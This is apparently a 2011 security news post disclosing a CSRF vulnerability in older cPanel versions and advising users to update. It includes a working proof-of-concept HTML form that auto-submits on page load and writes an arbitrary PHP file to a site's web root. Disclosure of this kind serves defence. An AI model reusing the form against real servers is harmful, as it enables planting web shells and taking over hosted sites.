May 28, 2011Mohit Kumar
Security Alert : cPanel 11.25 CSRF vulnerability to upload any php Script !
cPanel versions below and excluding 11.25 , are vulnerable to CSRF which leads to uploading a PHP script of the attackers liking. If you have turned off security tokens and referrer security check, no matter what version you are using, you are vulnerable as well.
Proof Of Concept :
<form name="editform" action=" |
https://localhost:2082/frontend/x3/err/savefile.html" method=POST |
onSubmit="return loadfdata();"> |
<input type="hidden" id="codepage" class="codepress html" name="page" |
value="<?php echo 'ninjashell'; ?>"> |
<input type="hidden" name="domain" value="localhost"> |
<input type="hidden" value="public_html/" name="dir"> |
<input type="hidden" value="ninjashell.php" name="file"> |
<body onload="document.forms.editform.submit();"> |
Afterwards simply check for
ninjashell.php in the directory.
All cPanel versions starting from 11.25 and above have two in-built security features to prevent such attacks - security tokens and referrer security check. This means that if you are a cpanel client, you should update your
software.
The Vulnerability has been found & Submitted to us by
Ninja-Shell , An Ethical hacker, Freelance security consultant/penetration tester & Security researcher in the spare time. He has Over 12 years of experience. You can Contact him at
ninjashellmail@gmail.com .Found this article interesting? Follow us on
Twitter and
LinkedIn to read more exclusive content we post.
